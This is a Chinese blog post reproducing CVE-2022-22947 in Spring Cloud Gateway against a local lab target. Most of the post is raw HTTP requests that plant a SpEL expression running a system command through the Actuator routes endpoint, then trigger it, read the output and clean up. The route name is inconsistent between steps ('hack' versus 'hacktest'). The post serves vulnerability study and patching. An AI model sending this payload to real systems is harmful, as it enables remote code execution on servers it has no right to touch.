Spring Cloud Gateway 远程代码执行(CVE-2022-22947)

最新推荐文章于 2024-10-10 20:24:13 发布
最新推荐文章于 2024-10-10 20:24:13 发布
阅读量439 收藏 10
点赞数 12
文章标签: 安全 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62484818/article/details/142774184
版权

漏洞概述

Spring Cloud Gateway是基于Spring Framework和Spring Boot构建的API网关,它旨在为微服务架构提供一种简单、有效、统一的 API路由管理方式。

Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本(包含)以前存在一处SpEL表达式注入漏洞,当攻击者可以访问Actuator API的情况下,将可以利用该漏洞执行任意命令。

影响版本

Spring Cloud Gateway < 3.1.1

Spring Cloud Gateway < 3.0.7 Spring Cloud Gateway

其他已不再更新的版本

漏洞复现

使用信息泄露字典对靶场进行爆破,发现actuator下有数据,但是并未爆破到actuator/gateway/routes/路径,访问下看下

下面开始漏洞利用

1.首先构造一个post请求包,可利用如下数据包添加一个包含恶意SpEL表达式的路由

POST /actuator/gateway/routes/hack HTTP/1.1

Host: localhost:8080

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36

Connection: close

Content-Type: application/json

Content-Length: 329

{

"id": "hack",

"filters": [{

"name": "AddResponseHeader",

"args": {

"name": "Result",

"value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"

}

}],

"uri": "http://example.com:80",

"order":0

}

需要注意的是这里的content-type需要是json格式

2.触发对SpEL表达式的执行

POST /actuator/gateway/refresh HTTP/1.1

Host: localhost:8080

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 0

3.查看执行结果

GET /actuator/gateway/routes/hacktest HTTP/1.1

Host: localhost:8080

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 0

4.删除添加的路由

DELETE /actuator/gateway/routes/hacktest HTTP/1.1

Host: localhost:8080

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36

Connection: close

5.刷新路由

POST /actuator/gateway/refresh HTTP/1.1

Host: localhost:8080

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36

Connection: close

Content-Type: application/x-www-form-urlencoded

椰子树上的苹果
关注
Spring Cloud Gateway远程代码执行漏洞(CVE-2022-22947
初岄的博客
07-09 916
Spring Cloud Gateway远程代码执行漏洞(CVE-2022-22947
Spring Cloud Gateway远程代码执行CVE-2022-22947漏洞分析及复现
include_voidmain的博客
03-29 1740
0x01 漏洞描述 Spring Cloud Gateway 是基于 Spring Framework 和 Spring Boot 构建的 API 网关,它旨在为微服务架构提供一种简单、有效、统一的 API 路由管理方式。 据公布的漏洞描述称,当Spring Cloud Gateway 执行器端点启用、公开且不安全时,使用Spring Cloud Gateway的应用程序容易受到代码注入攻击。远程攻击者可以发出含有恶意代码的请求,从而允许在远程主机上任意远程执行。 0x02 漏洞影响 漏洞编号:CVE-2
SpringCloudGateway远程代码执行CVE-2022-22947
m0_57379855的博客
03-12 1529
@TOC 基本介绍 微服务架构与Spring Cloud 【1】微服务架构 是一项在云中部署应用和服务的新技术。大部分围绕微服务的争论都集中在容器或其他技术是否能很好的实施微服务,而红帽说API应该是重点。 微服务可以在“自己的程序”中运行,并通过“轻量级设备与HTTP型API进行沟通”。 关键在于该服务可以在自己的程序中运行。 通过这一点我们就可以将服务公开与微服务架构(在现有系统中分布一个API)区分开来。 在服务公开中,许多服务都可以被内部独立进程所限制。 如果其中任何一个服务需要增加某种功能,那么就
Spring Cloud Gateway 远程代码执行漏洞(CVE-2022-22947
web_15534274656的博客
09-11 755
深知大多数初中级Java工程师,想要提升技能,往往是自己摸索成长或者是报班学习,但对于培训机构动则近万的学费,着实压力不小。自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《Java开发全套学习资料》送给大家,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。
Spring Cloud Gateway远程代码执行漏洞复现(CVE-2022-22947)
m0_63299551的博客
06-24 505
这里在burp抓包时要将burp代理地址改为本机地址要不然会抓不到 127.0.0.1的数据包。接着创建application.yml文件 具体步骤和代码如下。将pom.xml文件替换成下面所写的。接着配置maven 这里参考了一篇文章。可以看到环境搭建成功 接着进行漏洞复现。
CVE-2022-22947 Spring Cloud Gateway 远程代码执行漏洞复现
weixin_45260839的博客
05-08 3255
CVE-2022-22947 Spring Cloud Gateway 远程代码执行漏洞复现
CVE-2022-22947Spring Cloud Gateway 远程代码执行漏洞复现及修复建议
热门推荐
一只爱吃橙子的羊
03-12 2万+
CVE-2022-22947Spring Cloud Gateway 远程代码执行漏洞复现及修复建议
Spring Cloud Gateway 远程代码执行漏洞 (CVE-2022-22947
weixin_42299610的博客
06-02 965
Spring Cloud Gateway 远程代码执行漏洞 (CVE-2022-22947
Spring Cloud GateWay SPEL RCE(CVE-2022-22947
weixin_43263451的博客
08-15 1581
这个漏洞本质是一个SPEL注入漏洞,需要应用暴漏actuator接口用来动态添加路由当Gateway Actuator端点是启用状态并且是允许访问的以及相关配置不安全时,使用Spring Cloud Gateway的应用程序容易受到代码注入攻击。远程攻击者可以利用Actuator动态添加恶意路由,若路由中包括SPEL表达式则在路由刷新时会对其进行解析从而达到SPEL表达式注入本质是一个SPEL表达式注入漏洞,本来是只有在修改路由配置文件的情况下才能导致RCE,但是由于Gateway提供了Actuator。.
CVE-2022-22947 Spring Cloud Gateway远程代码执行漏洞复现
热爱学习,喜欢折腾!
09-06 3186
Spring Cloud Gateway是基于Spring Framework 和 Spring Boot构建的API网关,它旨在为微服务架构提供一种简单、有效、统一的API路由管理方式。建议使用Spring Cloud Gateway的用户及时安排自检并做好安全加固。近日,披露Spring Cloud Gateway存在一处远程代码执行漏洞(CVE-2022-22947)。
CVE-2022-22947-Spring-Cloud-Gateway 内存马POC
03-29
Spring官方博客发布了一篇关于Spring Cloud GatewayCVE报告,据公告描述,当启用和暴露 Gateway Actuator 端点时,使用 Spring Cloud Gateway 的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求,从而...
信息安全工程师(28)机房安全分析与防护
m0_73399576的博客
10-02 1054
信息安全工程师——机房安全分析与防护篇
T-Box联网安全定义
xxdw1992的博客
10-10 782
T-Box,即Telematics BOX,也称远程信息处理控制单元(Telematics Control Unit,TCU),是车联网中的重要组成部分。它集成了GPS、外部通信接口、电子处理单元、微控制器、移动通信单元和存储器等功能模块,为车端与车联网的连接提供了入口,并为车机等设备提供上网服务。然而,随着其功能的日益强大和联网特性的存在,T-Box的联网安全问题也日益凸显。
什么是网络安全
m0_66268916的博客
10-07 464
全站防护是基于风险管理和WAAP理念打造的安全方案,以“体系化主动安全” 取代安全产品的简单叠加,为各类Web、API业务等防御来自网络层和应用层的攻击,帮助企业全面提升Web安全水位和安全运营效率。网络安全是指通过采取必要措施,防范对网络的攻击、侵入、干扰、破坏和非法使用以及意外事故,使网络处于稳定可靠运行的状态,以及保障网络数据的完整性、保密性、可用性的能力。网络安全涉及多个层面,包括硬件、软件及其系统中数据的保护和确保网络系统的连续可靠运行,防止数据被破坏、更改、泄露。
鸿蒙开发(NEXT/API 12)【安全单元访问开发】网络篇
鸿蒙的技术博客
10-10 317
安全单元(SecureElement,简称SE),电子设备上可能存在一个或多个安全单元,比如有eSE(Embedded SE)和SIM卡。能够充当安全单元的SIM卡,要求具备NFC功能。
【隐私计算篇】多方安全计算之函数秘密共享(FSS)
源泉的小广场
10-04 1177
fss、函数秘密共享、函数秘密分享、分布式点函数、DPF、Distributed Point Function、多方安全计算、安全多方计算、MPC、多服务器PIR、SilentOT、PCG for tensor product from LPN and FSS
PWN二进制安全修仙秘籍【第二章#二进制文件篇02】ELF文件详解
weixin_53801131的博客
10-07 740
形成一个进程镜像,每个进程都拥有独立的虚拟地址空间,这个空间如何布局是由记录在段头表中的程序头决定的。ELF文件头的e_phoff域给出了段头表的位置下面将展示一个可执行文件的程序头👇。
数据交换的金钟罩:合理利用安全数据交换系统,确保信息安全
文件数据安全交换
10-10 781
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。因此飞驰云联的安全数据交换系统---《Ftrans Ferry跨网文件安全交换系统》,通过建立可管控可审计、防泄露、安全合规的文件交换通道,解决政府单位在网络隔离条件下, 网间数据安全收发、摆渡和共享的难题,易用便捷,充分释放IT部门人力投入。
配置MAC地址安全
最新发布
zhgjx_ywz的博客
10-10 537
总的来说,配置MAC地址安全是网络管理中的一个关键策略,它不仅帮助保护网络不受未授权访问和其他类型的网络攻击,同时也提高了网络的管理效率和性能。G0/0/1接口的MAC地址学习的还是PC1的MAC地址,说明MAC地址数量限制成功。(1)配置S1的G0/0/1接口的最大MAC地址学习数量为 1。可以看到S1的G0/0/1接口学习到了PC1的MAC的地址表。(3)将PC4的MAC地址静态绑定在S1的G0/0/3接口。可以看到PC4的MAC地址类型为静态MAC地址。//配置该接口的最大MAC地址学习数量为1。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值